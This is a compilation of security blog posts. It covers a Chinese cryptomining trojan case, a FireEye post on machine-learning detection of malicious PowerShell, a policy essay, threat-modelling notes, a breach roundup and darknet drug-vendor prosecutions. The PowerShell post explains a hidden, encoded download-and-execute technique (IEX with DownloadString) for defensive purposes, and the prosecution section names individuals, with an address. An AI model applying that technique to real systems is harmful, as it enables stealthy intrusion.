The investigation began when Tencent detected the presence of a hidden Trojan horse with silent mining capabilities built into a cheat for a popular first person shooter video game. The plug-in provided a variety of cheats for the game, including "automatic aiming", "bullet acceleration", "bullet tracking" and "item display."  
Tencent referred the case to the Wei'an Municipal Public Security Bureau, who handled the case extremely well.  As they learned more about the trojans, they identified first the social media groups and forums where the trojan was being spread, and traced the identity of the person uploading the trojaned game cheat to a criminal named Yang Mobao. Mobao participated as a forum moderator on a site called the "Tianxia Internet Bar Forum" and members who received the cheat from him there widely shared it in other forums and social media sites, including many file shares on Baidu.
Mobao was popularizing the cheat program by encouraging others to make suggestions for new functionality.  The users who were using the tool did not suspect that they were actually mining crypto-currency while using the cheat.  More than 30,000 victims were using his cheat software and secretly mining crypto-currency for him.
Yang Mobao had a strong relationship with gamers from his business of selling gaming video cards to Internet cafes.  He installed at least 5,774 cards in at least 2,465 Internet cafes across the country, preloading the firmware on the cards to perform mining.  It turns out that these cards ALSO were trojaned!  As a major customer of Dalian Yuping, Moubao was offered a split of the mining proceeds from the cards he installed, earning him more than 268,000 yuan.
Yang is described as a self-taught computer programmer who had previously worked management Internet cafes.  After experiencing some profit from the scheme above, he modified the malware embedded in some of the video cards and installed his own miner, mining the HSR coin and transferring the proceeds to a wallet he controlled.

The Video Card Maker

After Yang Mobao confessed to his crimes, the cybercrime task force sent 50 agents to Dalian, in Liaoning Province.  The Task Force learned that Dalian Yuping Network Technology had been approached by advertisers, who paid them embed advertising software on their video cards, which were then installed in 3.89 million computers, mostly high-end gaming systems installed in video cafes.  The company's owner, He Mou, and the company's Financial Controller, his wife Chen Mou, had instructed the company's head of R&D, Zhang Ning, to investigate mining software and to experiment with various mining trojans.  In addition to the illegal advertising software embedded in those 3.89 million video cards, their crypto currency mining software was embedded into 1 million additional video cards which were sold and deployed in Internet cafes across the country.
Each time one of those machines successfully mined a coin, the coin was transferred to a wallet owned by He Mou.  Chen Mou could then cash them out at any time in the future.
 16 suspects at the company were interrogated and 12 criminally detained for the crime of illegally controlling computer information systems.  Zhao was sentenced to four years himself.
(I learned of this story from CoinDesk's Wolfie Zhao, and followed up on it from the Legal Daily story he links to as well as a report in Xinhuanet, by Reporter Xy Peng and correspondent Liu Guizeng Wang Yen.) (记者 徐鹏 通讯员 刘贵增 王艳)

Malicious PowerShell Detection via Machine Learning


Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.

In this post you will learn:

  • Why malicious PowerShell can be challenging to detect with a traditional “signature-based” or “rule-based” detection engine.
  • How Natural Language Processing (NLP) can be applied to tackle this challenge.
  • How our NLP model detects malicious PowerShell commands, even if obfuscated.
  • The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.


PowerShell is one of the most popular tools used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).

Figure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 – blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series

FireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the tactics, techniques and procedures (TTPs) used in PowerShell attacks, as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to improve PowerShell logging, which gives greater visibility into potential attacker activity. More recently, our in-depth report on APT32 highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.

Figure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain

Let’s take a deep dive into an example of a malicious PowerShell command (Figure 3).

Figure 3: Example of a malicious PowerShell command

The following is a quick explanation of the arguments:

  • -NoProfile – indicates that the current user’s profile setup script should not be executed when the PowerShell engine starts.
  • -NonI – shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.
  • -W Hidden – shorthand for “-WindowStyle Hidden”, which indicates that the PowerShell session window should be started in a hidden manner.
  • -Exec Bypass – shorthand for “-ExecutionPolicy Bypass”, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn’t meant to be a security boundary.
  • -encodedcommand – indicates the following chunk of text is a base64 encoded command.

What is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.

Figure 4: The decoded command for the aforementioned example

Interestingly, the decoded command unveils a stealthy fileless network access and remote content execution!

  • IEX is an alias for the Invoke-Expression cmdlet that will execute the command provided on the local machine.
  • The new-object cmdlet creates an instance of a .NET Framework or COM object, here a net.webclient object.
  • The downloadstring will download the contents from <url> into a memory buffer (which in turn IEX will execute).

It’s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting CVE-2017-10271 to deliver a cryptocurrency miner. This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.

There are several reasons why adversaries prefer PowerShell:

  1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.
  2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.
  3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.

Additionally, from an economics perspective:

  • Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with open source obfuscation tools.
  • Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.

Next, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.

Natural Language Processing for Detecting Malicious PowerShell

Can we use machine learning to predict if a PowerShell command is malicious?

One advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.

After we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.

One of the technical challenges we tackled was synonym, a problem studied in linguistics. For instance, “NOL”, “NOLO”, and “NOLOGO” have identical semantics in PowerShell syntax. In NLP, a stemming algorithm will reduce the word to its original form, such as “Innovating” being stemmed to “Innovate”.

We created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as trie, as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.

Figure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)

The overall NLP pipeline we developed is captured in the following table:

NLP Key Modules



Detect and decode any encoded text

Named Entity Recognition (NER)

Detect and recognize any entities such as IP, URL, Email, Registry key, etc.


Tokenize the PowerShell command into a list of tokens


Stem tokens into semantically identical token, uses trie

Vocabulary Vectorizer

Vectorize the list of tokens into machine learning friendly format

Supervised classifier

Binary classification algorithms:

  • Kernel Support Vector Machine
  • Gradient Boosted Trees
  • Deep Neural Networks


The explanation of why the prediction was made. Enables analysts to validate predications.

The following are the key steps when streaming the aforementioned example through the NLP pipeline:

  • Detect and decode the Base64 commands, if any
  • Recognize entities using Named Entity Recognition (NER), such as the <URL>
  • Tokenize the entire text, including both clear text and obfuscated commands
  • Stem each token, and vectorize them based on the vocabulary
  • Predict the malicious probability using the supervised learning model

Figure 6: NLP pipeline that predicts the malicious probability of a PowerShell command

More importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.

Figure 7: End-to-end machine learning production pipeline for PowerShell machine learning

Value Validated in the Field

We successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:

  • Commodity malware such as Kovter.
  • Red team penetration test activities.
  • New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.

The unique values brought by the PowerShell machine learning detection engine include:  

  • The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.
  • The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.

The ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.


We would like to acknowledge:

  • Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.
  • Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.
  • Research endpoint support from Caleb Madrigal.
  • The FireEye ICE-DS Team.

If An Infosec Policy Falls In The Forest

When you are building an Information Security practice you need a solid governance structure in place. For those of you who might not be familiar we can look at it a more accessible way. If you are building a house you need a solid foundation otherwise the thing will collapse.
Much in the same vein, if you do not have a solid set of policies, you are destined to fail.

All is not lost as there are all sorts of resources that are available to help you online. The key point to remember is that with anything you find should never be used verbatim. If you cut and paste a policy you find online and swap the letterhead you should just hang up your tin star now. Do not pass go. Do not collect $200.

Why? Well, let’s cut to the chase. No company is the same as the next. You would be doing yourself and your organization a disservice if you are to maintain this perspective. OK, so if you are maintaining the idea that because you work at Bank A and Bob has a job in governance at Bank B that you will not be able to take their policy and simply use it at your own. Realistically you will need to tailor any policy to your own environment.

If you don’t have a proper governance structure in place it can cause you some angst. As an example, how can you remove an employee who is surfing porn on the Internet if you have no framework in place to deal with such an action? That is the simplest example that comes to mind.

To spin it differently, there was a shop that I worked for at which I was told that I could not use a certain piece of software. It was a fairly benign software application so, I couldn’t help but to ask why. Now, bearing in mind I had no argument with being told no. I was just interested in knowing what the rationale was for that decision. The answer I received was, “because $group said no.”


I asked the unforgivable question. I said, “OK, can I see the documentation regarding that decision? I just want to better understand why.” I was greeted with a Jedi hand wave. This isn’t OK. If you don’t have things documented then they do not exist. Pure and simple.
So, when you are tackling the policies for your organization be sure to go beyond the flaming sword of justice approach to governance. It is simply a dead method for dealing with the foundation for your security program. You want to facilitate the business in a safe and secure way to ensure that security is not the “road block” of old while saving the organization from itself.

When you create your policy documents make sure that they receive reviews from senior leadership, legal and human resources departments. Failing to do so will limit the veracity and adoption of a policy.

If you do not communicate your policies within your organization, how can you expect people to abide by them? Communication is a mainstay of any governance program. Go forth and bring the positive word of security to the masses.

If an information security policy falls in the corporate forest…does anyone read it?

Originally posted on CSO Online by me.

The post If An Infosec Policy Falls In The Forest appeared first on Liquidmatrix Security Digest.

Threat Model Thursdays: Crispin Cowan

Over at the Leviathan blog, Crispin Cowan writes about “The Calculus Of Threat Modeling.” Crispin and I have collaborated and worked together over the years, and our approaches are explicitly aligned around the four question frame.

What are we working on?

One of the places where Crispin goes deeper is definitional. He’s very precise about what a security principal is:

A principal is any active entity in system with access privileges that are in any way distinct from some other component it talks to. Corollary: a principal is defined by its domain of access (the set of things it has access to). Domains of access can, and often do, overlap, but that they are different is what makes a security principal distinct.

This also leads to the definition of attack surface (where principals interact), trust boundaries (the sum of the attack surfaces) and security boundaries (trust boundaries for which the engineers will fight). These are more well-defined than I tend to have, and I think it’s a good set of definitions, or perhaps a good step forward in the discussion if you disagree.

What can go wrong?

His approach adds much more explicit description of principals who own elements of the diagram, and several self-check steps (“Ask again if we have all the connections..”) I think of these as part of “did we do a good job?” and it’s great to integrate such checks on an ongoing basis, rather than treating it as a step at the end.

What are we going to do about it?

Here Crispin has assessing complexity and mitigations. Assessing complexity is an interesting approach — a great many vulnerabilities appear on the most complex interfaces, and I think it’s a useful strategy, similar to ‘easy fixes first’ for a prioritization approach.

He also has “c. Be sure to take a picture of the white board after the team is done describing the system.” “d. Go home and create a threat model diagram.” These are interesting steps, and I think deserve some discussion as to form (I think this is part of ‘what are we working on?’) and function. To function, we already have “a threat model diagram,” and a record of it, in the picture of the whiteboard. I’m nitpicking here for two very specific reasons. First, the implication that what was done isn’t a threat model diagram isn’t accurate, and second, as the agile world likes to ask “why are you doing this work?”

I also want to ask, is there a reason to go from whiteboard to Visio? Also, as Crispin says, he’s not simply transcribing, he’s doing some fairly nuanced technical editing, “Collapse together any nodes that are actually executing as the same security principal.” That means you can’t hand off the work to a graphic designer, but you need an expensive security person to re-consider the whiteboard diagram. There are times that’s important. If the diagram will be shown widely across many meetings; if the diagram will go outside the organization, say, to regulators; if the engineering process is waterfall-like.

Come together

Crispin says that tools are substitutes for expertise, and that (a? the?) best practice is for a security expert and the engineers to talk. I agree, this is a good way to do it — I also like to train the engineers to do this without security experts each time.

And that brings me to the we/you distinction. Crispin conveys the four question frame in the second person (What are you doing, what did you do about it), and I try to use the first person plural (we; what are we doing). Saying ‘we’ focuses on collaboration, on dialogue, on exploration. Saying ‘you’ frames this as a review, a discussion, and who knows, possibly a fight. Both of us used that frame at a prior employer, and today when I consult, I use it because I’m really not part of the doing team.

That said, I think this was a super-interesting post for the definitions, and for showing the diagram evolution and the steps taken from a whiteboard to a completed, colored diagram.

The image is the frontspiece of Leviathan by Thomas Hobbes, with its famous model of the state, made up of the people.

Cyber Security Roundup for June 2018

Dixons Carphone said hackers attempted to compromise 5.9 million payment cards and accessed 1.2 million personal data records. The company, which was heavily criticised for poor security and fined £400,000 by the ICO in January after been hacked in 2015, said in a statement the hackers had attempted to gain access to one of the processing systems of Currys PC World and Dixons Travel stores. The statement confirmed 1.2 million personal records had been accessed by the attackers. No details were disclosed explaining how hackers were able to access such large quantities of personal data, just a typical cover statement of "the investigation is still ongoing".  It is likely this incident occurred before the GDPR law kicked in at the end of May, so the company could be spared the new more significant financial penalties and sanctions the GDPR gives the ICO, but it is certainly worth watching the ICO response to a repeat offender which had already received a record ICO fine this year. The ICO (statement) and the NCSC (statement) both have released statements about this breach.

Ticketmaster reported the data theft of up to 40,000 UK customers, which was caused by security weakness in a customer support app, hosted by Inbenta Technologies, an external third-party supplier to Ticketmaster. Ticketmaster informed affected customers to reset their passwords and has offered (to impacted customers) a free 12-month identity monitoring service with a leading provider. No details were released on how the hackers exploited the app to steal the data, likely to be a malware-based attack. However, there are questions on whether Ticketmaster disclosed and responded to the data breach quick enough, after digital banking company Monzo, claimed the Ticketmaster website showed up as a CPP (Common Point of Purchase) in an above-average number of recent fraud reports. The company noticed 70% of fraudulent transactions with stolen payment cards had used the Ticketmaster site between December 2017 and April 2018. The UK's National Cyber Security Centre said it was monitoring the situation.

TSB customers were targetted by fraudsters after major issues with their online banking systems was reported. The TSB technical issues were caused by a botched system upgrade rather than hackers. TSB bosses admitted 1,300 UK customers had lost money to cyber crooks during its IT meltdown, all were said to be fully reimbursed by the bank.
The Information Commissioner's Office (ICO) issued Yahoo a £250,000 fine after an investigation into the company's 2014 breach, which is a pre-GDPR fine. Hackers were able to exfiltrate 191 server backup files from the internal Yahoo network. These backups held the personal details of 8.2 million Yahoo users, including names, email addresses, telephone numbers, dates of birth, hashed password and other security data. The breach only came to light as the company was being acquired by Verizon.

Facebook woes continue, this time a bug changed the default sharing setting of 14 million Facebook users to "public" between 18th and 22nd May.  Users who may have been affected were said to have been notified on the site’s newsfeed.

Chinese Hackers were reported as stealing secret US Navy missile plans. It was reported that Chinese Ministry of State Security hackers broke into the systems of a contractor working at the US Naval Undersea Warfare Center, lifting a massive 614GB of secret information, which included the plans for a supersonic anti-ship missile launched from a submarine. The hacks occurred in January and February this year according to a report in the Washington Post.

Elon Musk (Telsa CEO) claimed an insider sabotaged code and stole confidential company information.  According to CNBC, in an email to staff, Elon wrote I was dismayed to learn this weekend about a Tesla employee who had conducted quite extensive and damaging sabotage to our operations. This included making direct code changes to the Tesla Manufacturing Operating System under false usernames and exporting large amounts of highly sensitive Tesla data to unknown third parties". Telsa has filed a lawsuit accusing a disgruntled former employee of hacking into the systems and passing confidential data to third parties. In the lawsuit, it said the stolen information included photographs and video of the firm's manufacturing systems, and the business had suffered "significant and continuing damages" as a result of the misconduct.

Elsewhere in the world, FastBooking had 124,000 customer account stolen after hackers took advantage of a web application vulnerability to install malware and exfiltrate data. Atlanta Police Dashcam footage was hit by Ransomware.  And US company HealthEquity had 23,000 customer data stolen after a staff member fell for a phishing email.

IoT Security
The Wi-Fi Alliance announced WPA3, the next generation of wireless security, which is more IoT device friendly, user-friendly, and more secure than WPA2, which recently had a security weakness reported (see Krack vulnerability). BSI announced they are developing a new standard for IoT devices and Apps called ISO 23485. A Swann Home Security camera system sent a private video to the wrong user, this was said to have been caused by a factory error.  For Guidance on IoT Security see my guidance, Combating IoT Cyber Threats.

As always, a busy month for security patching, Microsoft released 50 patches, 11 of which were rated as Critical. Adobe released their monthly fix for Flash Player and a critical patch for a zero-day bug being actively exploited. Cisco released patches to address 34 vulnerabilities, 5 critical, and a critical patch for their Access Control System. Mozilla issued a critical patch for the Firefox web browser.


Dark Markets’ Weakness? Cashing out the Bitcoin to USD!

Over the years there has been an on-going battle between law enforcement and those who use technology-based anonymity to perform their illegal deeds.  Some of the FBI's tricks to break through the anonymity have created interesting challenges, such as the "Operation Pacifier" case, where the FBI used court orders to allow them to use hacking tricks to expose the true locations of members of a child sexual exploitation site with 150,000 members, leading to 350 US arrests and 548 international arrests.  In that case the FBI deployed "Network Investigative Techniques" (NITs) to learn the IP addresses of top members of a TOR protected .onion server.  To clarify the legality of that situation, Rule 41 of the Federal Rules of Practice and Procedure was amended in 2016 under some controversy, as we blogged about in "Rule 41 Changes: Search and Seizure when you don't know the Computer's location."

In the current case, "Operation: Dark Gold", perhaps as a demonstration that the old "Follow the Money" rule can work even in these modern times, law enforcement posed as cryptocurrency exchangers, offering attractive conversion rates to USD even for those clearly involved in criminal activity.  After Alexander Vinnik's BTC-e exchange was shuttered, with the owner accused of facilitating the laundering of $4 Billion in illicit funds, Dark Market vendors had a real problem!  How do you turn a few million dollars worth of Bitcoin into money that you can spend in "the real world?"

That's just the kind of problem that the Department of Justice's Money Laundering and Asset Recovery Section is happy to help criminals solve.  In a major operation, Special Agents from Homeland Security Investigations in New York posed as money launderers on various TOR-protected dark markets.  As the money launderers were able to drive conversations "off platform" they had the opportunity to refer cases around the nation and around the world.  So far, more than 90 cases have been opened, leading to investigations by ICE's HSI, the US Postal Inspection Service, and the US Drug Enforcement Agency.  65 targets were identified and 35 Darknet vendors have been arrested so far.  At least $20 million in Bitcoin and other cryptocurrencies was seized, as well as 333 bottles of liquid opioids, 100,000 tramadol pills, 100 grams of fentanyl, 24kg of Xanax, 100 firearms, including assault rifles and a grenade launcher, five vehicles, and $3.6 million in cash and gold bars.  They also seized 15 pill presses, and many computers and related equipment.

Powell and Gonzalez (BonnienClyde)

The case against Nicholas Powell and Michael Gonzalez really explains the background of some of these cases well. 

"In or about October 2016, HSI NY, USPIS, the USSS, and the NASA Office of Inspector General, apprehended a Cryptocurrency Exchanger/Unlicensed Money Remitter herein rferred to as Target Subject-1. With TS1's cooperation, agents began investigating TS1's customers.  From the limited subset of customers for whom TS1 saved any kind of personal information (such as the names and addresses to which TS1 had shipped the customers' cash), agents identified a number of vendors selling illegal goods and services on the dark net." (Gar-note: NASA OIG has one of the coolest most proactive cybercrime teams in Federal government.  Little-known FACT!)

"With TS1's permission, agents took control of TS1's online accounts and identity, initiating an undercover operation using that identity to create new accounts (the "UC Vendor Accounts") targeting dark net drug vendors who utilized TS1's services to launder their illicit proceeds.  Since January 2017, agents have advertised the UC Vendor Accounts' services on AlphaBay, HANSA, and other dark net marketplaces, which has led to hundreds of bitcoin-for-cash exchanges.  Because TS1's original business model involved sending cash to physical addresses, each UC Vendor Account transaction has provided agents with leads on the identities and locations of their counterparties.  Individuals who used the UC Vendor Account were charged a fee notably higher than the fee charged by Bitstamp or other exchanges with Know  Your Customer protocols.  This and other evidence helped establish that many of these "customers" were likely dark net vendors or controlled substances or other illicit goods.  Furthermore, and as explained below, in some instances, agents have successfully utilized undercover buyer accounts on dark net marketplaces to conduct undercover drug buys from vendors believed to be the UC Vendor Accounts' customers."

In this case, Law Enforcement first caught up with Michael Gonzalez in Parma, Ohio.  He claimed Nicholas Powell was the mastermind, and the only got paid to help with shipping and packaging of "a few orders."  His job was to measure out 500 gram bags of Xanax powder and handle the shipping.  Powell was found and interviewed in his home at 5283 Bevens Ave, Spring Hill, Florida on May 22, 2018.  Powell confirmed that he had begun selling steroids and weed on the dark net. Later he became a drop shipper, arranging shipments from China to be delivered domestically.  Powell started on Silkroad 2, using the name BCPHARMA, selling steroids and GHB that he purchased from China.  He sold on Agora and AlphaBay as BONNIENCLYDE or BNC.  Later he also used that alias on Evolution Markets.  He also shifted later to selling Xanax and steroids on AlphaBay.  He claimed he physically destroyed the computer he used for this work, and later also destroyed two Apple computers. 

Powell confirmed that he used TS1 to convert between $10,000 and $40,000 in crypto currencies to cash at a time, and would receive the packages via USPS Express.  He claims a Canadian vendor wanted to buy his online identity, and that he made $100,000 by transferring the "BONNIENCLYDE" id to the Canadian. 

Powell willingly signed over to agents $438,000 worth of cryptocurrencies.


TrapGod was an online vendor alias shared by  Antonio Tirado, 26 and Jeffrey Morales, 32, of Bronx, New York.  An affidavit from Antonio's search warrant shows he was growing marijuana and packaging and shipping both LSD and Cocaine.

Here's a photo of some of TrapGod's goods for sale on one dark market.

The 2050 means that 2,050 people have rated this vendor's services, giving an average review of 4.79 out of 5 stars.  Even the "bad" reviews, show that Trapgod was good to do business with.  One says "Vendor has been top notch. Then got some really sub-par stuff.  Contacted vendor. He said he'll take care of me next time. Will post again..."  Comments include things like "Great shipping, good stealth." and  "Stealth was good, my package was well hidden and secure.  Quality is good, after testing I found that the product is about a 80/20 cut as described!  I like honesty, plus seller put a little extra in my order!!"  "Shipment was delayed, quality not so good. However vendor sent an additional shipment to make up for it.  The price is good, but I'd rather pay more for higher quality."

Unfortunately, Morales and Tirado either weren't the only ones behind the Trapgod alias, or they are continuing to sell while out on bail.  Morales and Tirado's homes both got hit July 20, 2018, but there were fresh reviews posted yesterday (July 3, 2018).


The next group were worked as a single case (1:18-mj-05193-UA) also in New York, and involved raids on three houses in Flushing and Mt. Sinai, New York.  Charges are brought against Jian Qu, Raymeond Weng, Kai Wu, Dimitri Tseperkas, and Cihad Akkaya.

Kai Wu and Jian Qu were in one home, where $200,000 in cash, 110 kg of marijuana, and "680 grams of unidentified powders" were seized.

Residence-2 yielded 12kg of Alprazolam, 10kg of marijuana vape cartridges, 570 grams of ecstasy, "12kg of unidentified powder" and four pill presses, used to press powders into ecstasy tablets.  There were also at least 2 kg of THC gummies.

Residence-3 was the home of Dimitri Tseperkas and Cihad Akkaya, where law enforcement recovered $195,000 in cash, 30kg of marijuana, and three loaded shotguns and 100 shotgun shells.

Videos recovered from the cell phones of Wu and Weng (who was not home, but has been observed repeatedly at Residence-1) reveal they also have at least two marijuana grow houses.


Ryan Farace, who the indictment makes clear "has no known medical education, qualifications, or licensing in the State of Maryland or elsewhere", yet he and his partner were manufacturing and distributing serious amounts of Xanax.  So much so that the indictment calls for them to forfeit $5,665,000 in cash as well as a Lincoln Navigator, a  GMC pick-up truck, and 4,000 Bitcoins (which currently would be the USD equivalent of more than $26 MILLION dollars!

Not bad for the former parking lot attendant of a Home Depot ... according to Ryan's Facebook, where both of the named vehicles are featured:

The indictment charges the pair with "Conspiracy to Manufacture, Distribute, and Possess with Intent to Distribute Alprazolam" (aka Xanax) (21 USC section 846) as well as "Maintaining Drug-involved Premises" (21 USC section 856) and "Conspiracy to Commit Money Laundering" (18 USC section 1956).


Jose Robert Porras III and his girlfriend, Pasia Vue, were selling marijuana and crystal meth, as well as Xanax and Promethazine-codeine cough syrup (Lean).  The HSI agent noticed on their Dream Market account that they shared their rating from Hansa.  Big mistake.  The Dutch High Tech Crimes Unit has the seized servers from Hansa and is happy to do lookups for law enforcement.  This revealed that "CANNA_BARS" had earned about 56 bitcoins on Hansa, selling crystal meth in quantities as large as 1 pound bars!  They described the product there as "this crystal is directly from manufacturers in mexico so it is made with the highest qaulity products that cant be found in the us. expect the highest qaulity on hansa for the cheapest."  The same criminal also couldn't spell "qaulity" right on Dream Market, which was further confirmation this might be the same guy.  From Dream Market "whats up we are canna_bars a vendor of top qaulity weed we offer qps to multiple pounds we are operating out of northern california and have direct relationships with many growers so expect good qaulity for cheap prices."

By searching for this signature typo, "qaulity" for "quality", the agent was also able to confirm that CANNA_BARS was the same person that sold as THEFASTPLUG on Wall Street Market, another dark net marketplace.  They completed 60 orders there between Feb 2018 and May 13, 2018.

One of his loyal customers, y***h,  is apparently wishing him well after learning of the arrest ... in the comments section for THEFASTPLUG on Wall Street Market, they made this July 2, 2018 comment:

In one photograph shared by CANNA_BARS, his hands are shown, palms up, holding marijuana buds.  The fingerprints of the open palms were so clear that they could easily be used to run a fingerprint match:

The HSI Forensic Document Laboratory returned a fingerprint match confirming that the image showed the fingerprints for Jose Robert Porras III, who had prints on file.

CANNA_BARS offered "free samples" of marijuana, which the agent asked for and had shipped to another state.  The package arrived and was confirmed to contain marijuana. (The inner package was wrapped in fabric softener sheets, presumably to stop drug-sniffing dogs?)

HSI surveillance was used to follow Porras and Vue to a US Post Office where they shipped packages, a Bank of America branch where they had accounts, and to a storage unit, where they maintained their inventory.  Undercover purchases from CANNA_BARS of two pounds of marijuana, and THEFASTPLUG of three pounds of "og kush" marijuana were able to be observed in the gathering and shipping end of the surveillance, providing "end-to-end" proof of the identity of the criminals.

Some of the bitcoin that was used by CANNA_BARS was able to be linked via blockchain analysis to accounts that had a bit of KYC information attached.  This revealed four accounts at one exchanger, including one each for VUE (using the email "" and (916) 228-1506) and PORRAS.  These further linked to several bank accounts, two in the name of Pasia Vue, one in the name of Marcos Escobado (a brother(?) of Porras, and another in the name of Julie Hernandez.  Escobado was arrested in Oregon for possession of methamphetamine and had received $11,000 from the bitcoin exchanger in four transactions.

After TS1's money exchanger service was taken over by the feds, the couple did four more transactions, receiving $56,000 in cash shipped from New York to their drops in Live Oak and Sacramento, California.

In addition to the Drugs and Money laundering charges, Porras was charged with Felon Possessing a Firearm:

Sam & Djeneba Bent

Less details are revealed in the Vermont indictment against Sam & Djeneba Bent.  Same used dark markets to sell Ecstasy (MDMA), LSD, marijuana, and cocaine, and used the TS1 money exchanging service to cash out more than $10,000 from bitcoin to USD.

They are charged with using a false return address on a package shipped through the postal service.

(Just joking, I know this got long and I wondered if anyone had read this far, haha.)

Daniel Boyd McMonegal 

McMonegal became a dark market vendor in or around December 2016, which might be how he chose his vendor name, Christmastree.  McMonegal, according to the affidavit by Homeland Security Investigations, incorporated a "medical marijuana delivery dispensary" in December 2, 2016 under the name "West Coast Organix" in San Luis Obispo, California, and almost immediately started selling the drugs via interstate postal delivery via Dream Market using his Christmasstree vendor name.

From June 15, 2017 to May 12, 2018, Christmastree sold 2,800 packages and earned a 4.98 rating on Dream Market!

The rave reviews from buyers make it clear Christmastree really knew his stuff with high ratings on his Blue  Dream, OG Kush, Super Silver Haze, Blackberry Kush, and many others.  

Like the others, McMonegal's downfall was getting his Bitcoin turned into cash.  After the time the federal agents controlled TS1's exchange business, McMonegal used it to cash out at least $91,000 which was shipped to him in Mariposa, California in six shipments between April 2017 and March 2018.


For all the crap that is in the news recently about ICE, Homeland Security Investigations, the team that was at the lead of many of these investigations, are using technology and brilliant investigators to help shut down some of the worst crimes on the Internet.  If you know an ICE or HSI agent, make sure to let them know you appreciate what they are doing for us all!

(For more of this press conference, please see this YouTube video: "Officers arrest 35 in dark web bust, seize guns and drugs")